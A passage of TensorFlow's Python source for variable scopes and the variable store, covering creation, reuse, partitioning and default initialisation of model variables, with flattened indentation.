having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = True
@deprecation.deprecated(
None, "non-resource variables are not supported in the long term")
@tf_export(v1=["disable_resource_variables"])
def disable_resource_variables():
"""Opts out of resource variables.
If your code needs tf.disable_resource_variables() to be called to work
properly please file a bug.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = False
class _VariableStore(object):
"""Variable store that carries a number of named Variables.
New variable names and new variables can be created; all stored
variables are initialized with the initializer passed to __init__.
Attributes:
vars: a dictionary with string names (same as passed in GetVar) as keys
and the corresponding TensorFlow Variables as values.
"""
def __init__(self):
"""Create a variable store."""
self._vars = {} # A dictionary of the stored TensorFlow variables.
self._partitioned_vars = {} # A dict of the stored PartitionedVariables.
self._store_eager_variables = False
def get_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with these parameters or create a new one.
If a variable with the given name is already stored, we return the stored
variable. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
of variables. When eager execution is enabled this argument is always
forced to be False.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
`trainable` defaults to `True` unless `synchronization` is
set to `ON_READ`.
collections: List of graph collections keys to add the `Variable` to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the `Variable` reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and dtype of the `Variable` to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates
instead an experimental ResourceVariable which has well-defined
semantics. Defaults to False (will later change to True).
When eager execution is enabled this argument is always forced to be
true.
custom_getter: Callable that takes as a first argument the true getter,
and allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
      synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
or when violating reuse during variable creation.
RuntimeError: when eager execution is enabled and not called from an
EagerVariableStore.
"""
if custom_getter is not None and not callable(custom_getter):
raise ValueError(
"Passed a custom_getter which is not callable: %s" % custom_getter)
with ops.init_scope():
if context.executing_eagerly():
# Variable creation and initialization takes place in `init_scope`s;
# as such, if an `init_scope` lifts us into the eager context, then we
# need to use `ResourceVariable`s.
use_resource = True
# Note that it's fine to reuse eager variables whose initialization was
# lifted from a function-building graph into the eager context (that's why
# the following clause is not wrapped in an `init_scope`); lifted variables
# are tracked by the graph's `VariableStore`.
if context.executing_eagerly():
if not self._store_eager_variables and reuse:
raise RuntimeError(
"When eager execution is enabled variable reuse is only supported"
" when an EagerVariableStore is active. See the documentation on"
" EagerVariableStore for example usage.")
if self._store_eager_variables:
reuse = AUTO_REUSE
# If a *_ref type is passed in an error would be triggered further down the
# stack. We prevent this using base_dtype to get a non-ref version of the
# type, before doing anything else. When _ref types are removed in favor of
# resources, this line can be removed.
try:
dtype = dtype.base_dtype
except AttributeError:
# .base_dtype not existing means that we will try and use the raw dtype
# which was passed in - this might be a NumPy type which is valid.
pass
# This is the main logic of get_variable. However, custom_getter
# may override this logic. So we save it as a callable and pass
# it to custom_getter.
# Note: the parameters of _true_getter, and their documentation, match
# *exactly* item-for-item with the docstring of this method.
def _true_getter( # pylint: disable=missing-docstring
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
is_scalar = (shape is not None
and isinstance(shape, collections_lib.Sequence)
and not shape)
# Partitioned variable case
if partitioner is not None and not is_scalar:
if not callable(partitioner):
raise ValueError(
"Partitioner must be callable, but received: %s" % partitioner)
with ops.name_scope(None):
return self._get_partitioned_variable(name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint)
# Special case for partitioned variable to allow reuse without having to
# specify partitioner.
if (reuse is True and partitioner is None
and name in self._partitioned_vars):
return self._get_partitioned_variable(name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=None,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint)
# Single variable case
if "%s/part_0" % name in self._vars:
raise ValueError(
"No partitioner was provided, but a partitioned version of the "
"variable was found: %s/part_0. Perhaps a variable of the same "
"name was already created with partitioning?" % name)
return self._get_single_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Set trainable value based on synchronization value.
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
if custom_getter is not None:
# Handle backwards compatibility with getter arguments that were added
# to the API after users started writing custom getters.
custom_getter_kwargs = {
"getter": _true_getter,
"name": name,
"shape": shape,
"dtype": dtype,
"initializer": initializer,
"regularizer": regularizer,
"reuse": reuse,
"trainable": trainable,
"collections": collections,
"caching_device": caching_device,
"partitioner": partitioner,
"validate_shape": validate_shape,
"use_resource": use_resource,
"synchronization": synchronization,
"aggregation": aggregation,
}
# `fn_args` and `has_kwargs` can handle functions, `functools.partial`,
# `lambda`.
if ("constraint" in function_utils.fn_args(custom_getter) or
function_utils.has_kwargs(custom_getter)):
custom_getter_kwargs["constraint"] = constraint
return custom_getter(**custom_getter_kwargs)
else:
return _true_getter(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
name,
partitioner,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
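    For example (illustrative), a partitioner such as
    `lambda shape, dtype: [1, 3]` splits a rank-2 variable into three shards
    along dimension 1; `fixed_size_partitioner` builds this kind of callable.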
Args:
name: the name of the new or existing sharded variable.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
shape: shape of the new or existing sharded variable.
dtype: type of the new or existing sharded variable
(defaults to `DT_FLOAT`).
initializer: initializer for the sharded variable.
regularizer: a (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
of variables.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable which has well-defined semantics. Defaults
to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
Returns:
A `PartitionedVariable` object.
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
when violating reuse during variable creation, or if an existing
sharded variable exists for the given name but with different sharding.
"""
if context.executing_eagerly():
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
initializing_from_value = initializer is not None and isinstance(
initializer, ops.Tensor)
reuse_without_partition = reuse and not partitioner
if name in self._vars:
raise ValueError(
"A partitioner was provided, but an unpartitioned version of the "
"variable was found: %s. Perhaps a variable of the same name was "
"already created without partitioning?" % name)
shape = tensor_shape.as_shape(shape)
if initializing_from_value:
shape = shape.merge_with(initializer.get_shape())
if not reuse_without_partition:
if not shape.is_fully_defined():
raise ValueError("Shape of a new partitioned variable (%s) must be "
"fully defined, but instead was %s." % (name, shape))
if shape.ndims < 1:
raise ValueError("A partitioned Variable must have rank at least 1, "
"shape: %s" % shape)
partitions = partitioner(shape=shape, dtype=dtype)
if not isinstance(partitions, collections_lib.Sequence):
raise ValueError("Partitioner must return a sequence, but saw: %s"
% partitions)
if len(partitions) != shape.ndims:
raise ValueError(
"Partitioner returned a partition list that does not match the "
"Variable's rank: %s vs. %s" % (partitions, shape))
if any([p < 1 for p in partitions]):
raise ValueError(
"Partitioner returned zero partitions for some axes: %s" %
partitions)
if name in self._partitioned_vars:
if reuse is False:
raise ValueError(
"Partitioned variable with name %s already exists. Did you mean to "
"set reuse=True or reuse=tf.AUTO_REUSE in VarScope?"
% name)
existing_var = self._partitioned_vars[name]
if not shape.is_compatible_with(existing_var.get_shape()):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified shape %s "
"and found shape %s."
% (name, shape, existing_var.get_shape()))
if not dtype.is_compatible_with(existing_var.dtype):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified dtype %s "
"and found dtype %s."
% (name, dtype.name, existing_var.dtype.name))
# pylint: disable=protected-access
if (not reuse_without_partition and
existing_var._get_partitions() != partitions):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified partitions "
"%s and found partitions %s." %
(name, partitions, existing_var._get_partitions()))
# pylint: enable=protected-access
return existing_var
if reuse is True:
raise ValueError("PartitionedVariable %s does not exist, or was not "
"created with tf.get_variable(). Did you mean to set "
"reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
slice_dim, slice_shape = _compute_slice_dim_and_shape(
shape.as_list(), partitions)
vs = []
num_slices = partitions[slice_dim]
num_slices_with_excess = shape[slice_dim].value % num_slices
slice_offset = [0] * shape.ndims
if "%s/part_0" % name in self._vars:
if "%s/part_%d" % (name, num_slices - 1) not in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but %s/part_%d was not."
% (num_slices, name, name, num_slices - 1))
if "%s/part_%d" % (name, num_slices) in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but so was the extra shard %s/part_%d."
% (num_slices, name, name, num_slices))
for i in xrange(num_slices):
var_shape = slice_shape[:]
var_offset = slice_offset[:]
partition_info = _PartitionInfo(
full_shape=shape.as_list(), var_offset=var_offset)
if i < num_slices_with_excess:
var_shape[slice_dim] += 1
slice_offset[slice_dim] += var_shape[slice_dim]
var_full_name = "%s/part_%d" % (name, i)
with ops.name_scope(var_full_name + "/PartitionedInitializer"):
# Create the tensor to initialize the variable with default value.
if initializer is None:
init, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
if initializing_from_value:
init_shape = None
else:
init_shape = var_shape
elif callable(initializer):
init = initializer
init_shape = var_shape
elif isinstance(initializer, ops.Tensor):
init = array_ops.slice(initializer, var_offset, var_shape)
# Use the dtype of the given tensor.
dtype = init.dtype.base_dtype
init_shape = None
else:
init = ops.convert_to_tensor(initializer, dtype=dtype)
init = array_ops.slice(init, var_offset, var_shape)
init_shape = None
with ops.name_scope(None):
var = self._get_single_variable(
name=var_full_name,
shape=init_shape,
dtype=dtype,
initializer=init,
partition_info=partition_info,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint)
# pylint: disable=protected-access
var._set_save_slice_info(variables.Variable.SaveSliceInfo(
name, shape.as_list(), var_offset, var_shape))
vs.append(var)
# pylint: enable=protected-access
# pylint: disable=protected-access
partitioned_var = variables.PartitionedVariable(name=name,
shape=shape,
dtype=dtype,
variable_list=vs,
partitions=partitions)
# pylint: enable=protected-access
self._partitioned_vars[name] = partitioned_var
return partitioned_var
def _get_single_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
partition_info=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Get or create a single Variable (e.g. a shard or entire variable).
See the documentation of get_variable above (ignore partitioning components)
for details.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
initializer: see get_variable.
regularizer: see get_variable.
partition_info: _PartitionInfo object.
reuse: see get_variable.
trainable: see get_variable.
collections: see get_variable.
caching_device: see get_variable.
validate_shape: see get_variable.
use_resource: see get_variable.
constraint: see get_variable.
synchronization: see get_variable.
aggregation: see get_variable.
Returns:
A Variable. See documentation of get_variable above.
Raises:
ValueError: See documentation of get_variable above.
"""
# Set to true if initializer is a constant.
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if shape is not None and initializing_from_value:
raise ValueError("If initializer is a constant, do not specify shape.")
dtype = dtypes.as_dtype(dtype)
shape = tensor_shape.as_shape(shape)
if name in self._vars:
# Here we handle the case when returning an existing variable.
if reuse is False:
tb = self._vars[name].op.traceback[::-1]
# Throw away internal tf entries and only take a few lines.
tb = [x for x in tb if "tensorflow/python" not in x[0]][:3]
raise ValueError("Variable %s already exists, disallowed."
" Did you mean to set reuse=True or "
"reuse=tf.AUTO_REUSE in VarScope? "
"Originally defined at:\n\n%s" % (
name, "".join(traceback.format_list(tb))))
found_var = self._vars[name]
if not shape.is_compatible_with(found_var.get_shape()):
raise ValueError("Trying to share variable %s, but specified shape %s"
" and found shape %s." % (name, shape,
found_var.get_shape()))
if not dtype.is_compatible_with(found_var.dtype):
dtype_str = dtype.name
found_type_str = found_var.dtype.name
raise ValueError("Trying to share variable %s, but specified dtype %s"
" and found dtype %s." % (name, dtype_str,
found_type_str))
return found_var
# The code below handles only the case of creating a new variable.
if reuse is True:
raise ValueError("Variable %s does not exist, or was not created with "
"tf.get_variable(). Did you mean to set "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# Create the tensor to initialize the variable with default value.
if initializer is None:
initializer, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
# Enter an init scope when creating the initializer.
with ops.init_scope():
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if isinstance(initializer, type(init_ops.Initializer)):
initializer = initializer(dtype=dtype)
if shape and shape.is_fully_defined():
init_val = lambda: initializer( # pylint: disable=g-long-lambda
shape.as_list(), dtype=dtype, partition_info=partition_info)
elif not tf_inspect.getargspec(initializer).args:
init_val = initializer
else:
raise ValueError("You can only pass an initializer function that "
"expects no arguments to its callable when the "
"shape is not fully defined. The given initializer "
"function expects the following args %s" %
tf_inspect.getargspec(initializer).args)
variable_dtype = dtype.base_dtype
# Create the variable.
if use_resource is None:
# Set the default value if unspecified.
use_resource = _DEFAULT_USE_RESOURCE
v = variables.VariableV1(
initial_value=init_val,
name=name,
trainable=trainable,
collections=collections,
caching_device=caching_device,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation)
if context.executing_eagerly() and self._store_eager_variables:
if collections:
ops.add_to_collections(collections, v)
else:
ops.add_to_collection(ops.GraphKeys.GLOBAL_VARIABLES, v)
if trainable:
ops.add_to_collection(ops.GraphKeys.TRAINABLE_VARIABLES, v)
if not context.executing_eagerly() or self._store_eager_variables:
# In eager mode we do not want to keep default references to Variable
# objects as this will prevent their memory from being released.
self._vars[name] = v
logging.vlog(1, "Created variable %s with shape %s and init %s", v.name,
format(shape), initializer)
# Run the regularizer if requested and save the resulting loss.
if regularizer:
with ops.colocate_with(v):
with ops.name_scope(name + "/Regularizer/"):
with ops.init_scope():
loss = regularizer(v)
if loss is not None:
if context.executing_eagerly():
v_name = "v_%s" % type(v)
loss_name = "loss_%s" % type(loss)
else:
v_name = v.name
loss_name = loss.name
logging.vlog(1, "Applied regularizer to %s and added the result %s "
"to REGULARIZATION_LOSSES.", v_name, loss_name)
ops.add_to_collection(ops.GraphKeys.REGULARIZATION_LOSSES, loss)
return v
# Initialize variable when no initializer provided
def _get_default_initializer(self, name, shape=None, dtype=dtypes.float32):
"""Provide a default initializer and a corresponding value.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
Returns:
initializer and initializing_from_value. See get_variable above.
Raises:
ValueError: When giving unsupported dtype.
"""
del shape
    # If dtype is DT_FLOAT, provide a glorot uniform initializer
if dtype.is_floating:
initializer = init_ops.glorot_uniform_initializer()
initializing_from_value = False
    # If dtype is DT_INT/DT_UINT, provide a default value `zero`
    # If dtype is DT_BOOL, provide a default value `FALSE`
    # If dtype is DT_STRING, provide a default value of the empty string
elif (dtype.is_integer or dtype.is_unsigned or dtype.is_bool
or dtype == dtypes.string):
initializer = init_ops.zeros_initializer()
initializing_from_value = False
    # NOTE: Do we need special handling for DT_STRING and DT_COMPLEX here?
else:
raise ValueError("An initializer for variable %s of %s is required"
% (name, dtype.base_dtype))
return initializer, initializing_from_value
# To stop regularization, use this regularizer
@tf_export("no_regularizer")
def no_regularizer(_):
"""Use this function to prevent regularization of variables."""
return None
# TODO(alive): support caching devices and partitioned variables in Eager mode.
@tf_export(v1=["VariableScope"])
class VariableScope(object):
"""Variable scope object to carry defaults to provide to `get_variable`.
Many of the arguments we need for `get_variable` in a variable store are most
easily handled with a context. This object is used for the defaults.
Attributes:
name: name of the current scope, used as prefix in get_variable.
initializer: default initializer passed to get_variable.
regularizer: default regularizer passed to get_variable.
reuse: Boolean, None, or tf.AUTO_REUSE, setting the reuse in
get_variable. When eager execution is enabled this argument is always
forced to be False.
caching_device: string, callable, or None: the caching device passed to
get_variable.
partitioner: callable or `None`: the partitioner passed to `get_variable`.
custom_getter: default custom getter passed to get_variable.
name_scope: The name passed to `tf.name_scope`.
dtype: default type passed to get_variable (defaults to DT_FLOAT).
use_resource: if False, create a normal Variable; if True create an
experimental ResourceVariable with well-defined semantics. Defaults
to False (will later change to True). When eager execution is enabled
this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
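  A minimal illustrative sketch of reading these defaults from the active
  scope (the scope name and initializer below are only examples):
  ```python
  with tf.variable_scope("model", initializer=tf.zeros_initializer()):
    scope = tf.get_variable_scope()
    print(scope.name)         # "model" (when opened at the root scope)
    print(scope.initializer)  # the zeros initializer set above
  ```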
"""
def __init__(self,
reuse,
name="",
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
name_scope="",
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a new VariableScope with the given properties."""
self._name = name
self._initializer = initializer
self._regularizer = regularizer
self._reuse = reuse
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._name_scope = name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if context.executing_eagerly():
if self._caching_device is not None:
raise NotImplementedError("Caching devices is not yet supported "
"when eager execution is enabled.")
if self._partitioner is not None:
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
self._reuse = AUTO_REUSE
self._use_resource = True
@property
def name(self):
return self._name
@property
def original_name_scope(self):
return self._name_scope
@property
def reuse(self):
return self._reuse
@property
def initializer(self):
return self._initializer
@property
def dtype(self):
return self._dtype
@property
def use_resource(self):
return self._use_resource
@property
def regularizer(self):
return self._regularizer
@property
def caching_device(self):
return self._caching_device
@property
def partitioner(self):
return self._partitioner
@property
def custom_getter(self):
return self._custom_getter
@property
def constraint(self):
return self._constraint
def reuse_variables(self):
"""Reuse variables in this scope."""
self._reuse = True
def set_initializer(self, initializer):
"""Set initializer for this scope."""
self._initializer = initializer
def set_dtype(self, dtype):
"""Set data type for this scope."""
self._dtype = dtype
def set_use_resource(self, use_resource):
"""Sets whether to use ResourceVariables for this scope."""
if context.executing_eagerly() and not use_resource:
raise ValueError("When eager execution is enabled, "
"use_resource cannot be set to false.")
self._use_resource = use_resource
def set_regularizer(self, regularizer):
"""Set regularizer for this scope."""
self._regularizer = regularizer
def set_caching_device(self, caching_device):
"""Set caching_device for this scope."""
if context.executing_eagerly():
raise NotImplementedError("Caching devices are not yet supported "
"when eager execution is enabled.")
self._caching_device = caching_device
def set_partitioner(self, partitioner):
"""Set partitioner for this scope."""
if partitioner and context.executing_eagerly():
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
self._partitioner = partitioner
def set_custom_getter(self, custom_getter):
"""Set custom getter for this scope."""
self._custom_getter = custom_getter
def get_collection(self, name):
"""Get this scope's variables."""
scope = self._name + "/" if self._name else ""
return ops.get_collection(name, scope)
def trainable_variables(self):
"""Get this scope's trainable variables."""
return self.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
def global_variables(self):
"""Get this scope's global variables."""
return self.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
def local_variables(self):
"""Get this scope's local variables."""
return self.get_collection(ops.GraphKeys.LOCAL_VARIABLES)
def get_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if regularizer is None:
regularizer = self._regularizer
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if custom_getter is None:
custom_getter = self._custom_getter
if context.executing_eagerly():
reuse = False
use_resource = True
else:
if reuse is None:
reuse = self._reuse
if use_resource is None:
use_resource = self._use_resource
full_name = self.name + "/" + name if self.name else name
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# Check that `initializer` dtype and `dtype` are consistent before
# replacing them with defaults.
if (dtype is not None and initializer is not None and
not callable(initializer)):
init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
if init_dtype != dtype:
raise ValueError("Initializer type '%s' and explicit dtype '%s' "
"don't match." % (init_dtype, dtype))
if initializer is None:
initializer = self._initializer
if constraint is None:
constraint = self._constraint
if dtype is None:
dtype = self._dtype
return var_store.get_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None):
"""Gets an existing variable with this name or create a new one."""
if context.executing_eagerly():
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
if initializer is None:
initializer = self._initializer
if regularizer is None:
regularizer = self._regularizer
if constraint is None:
constraint = self._constraint
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if dtype is None:
dtype = self._dtype
if use_resource is None:
use_resource = self._use_resource
if self._custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % self._custom_getter)
if partitioner is None:
raise ValueError("No partitioner was specified")
# This allows the variable scope name to be used as the variable name if
# this function is invoked with an empty name arg, for backward
# compatibility with create_partitioned_variables().
full_name_list = []
if self.name:
full_name_list.append(self.name)
if name:
full_name_list.append(name)
full_name = "/".join(full_name_list)
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# pylint: disable=protected-access
return var_store._get_partitioned_variable(
full_name, shape=shape, dtype=dtype, initializer=initializer,
regularizer=regularizer, reuse=self.reuse, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=use_resource, constraint=constraint)
# pylint: enable=protected-access
_VARSTORE_KEY = ("__variable_store",)
_VARSCOPESTORE_KEY = ("__varscope",)
class _VariableScopeStore(threading.local):
"""A thread local store for the current variable scope and scope counts."""
def __init__(self):
super(_VariableScopeStore, self).__init__()
self.current_scope = VariableScope(False)
self.variable_scopes_count = {}
def open_variable_scope(self, scope_name):
if scope_name in self.variable_scopes_count:
self.variable_scopes_count[scope_name] += 1
else:
self.variable_scopes_count[scope_name] = 1
def close_variable_subscopes(self, scope_name):
for k in list(self.variable_scopes_count.keys()):
if scope_name is None or k.startswith(scope_name + "/"):
self.variable_scopes_count[k] = 0
def variable_scope_count(self, scope_name):
return self.variable_scopes_count.get(scope_name, 0)
def get_variable_scope_store():
"""Returns the variable scope store for current thread."""
scope_store = ops.get_collection(_VARSCOPESTORE_KEY)
if not scope_store:
scope_store = _VariableScopeStore()
ops.add_to_collection(_VARSCOPESTORE_KEY, scope_store)
else:
scope_store = scope_store[0]
return scope_store
@tf_export(v1=["get_variable_scope"])
def get_variable_scope():
"""Returns the current variable scope."""
return get_variable_scope_store().current_scope
def _get_default_variable_store():
store = ops.get_collection(_VARSTORE_KEY)
if store:
return store[0]
store = _VariableStore()
ops.add_to_collection(_VARSTORE_KEY, store)
return store
@tf_contextlib.contextmanager
def with_variable_store(store):
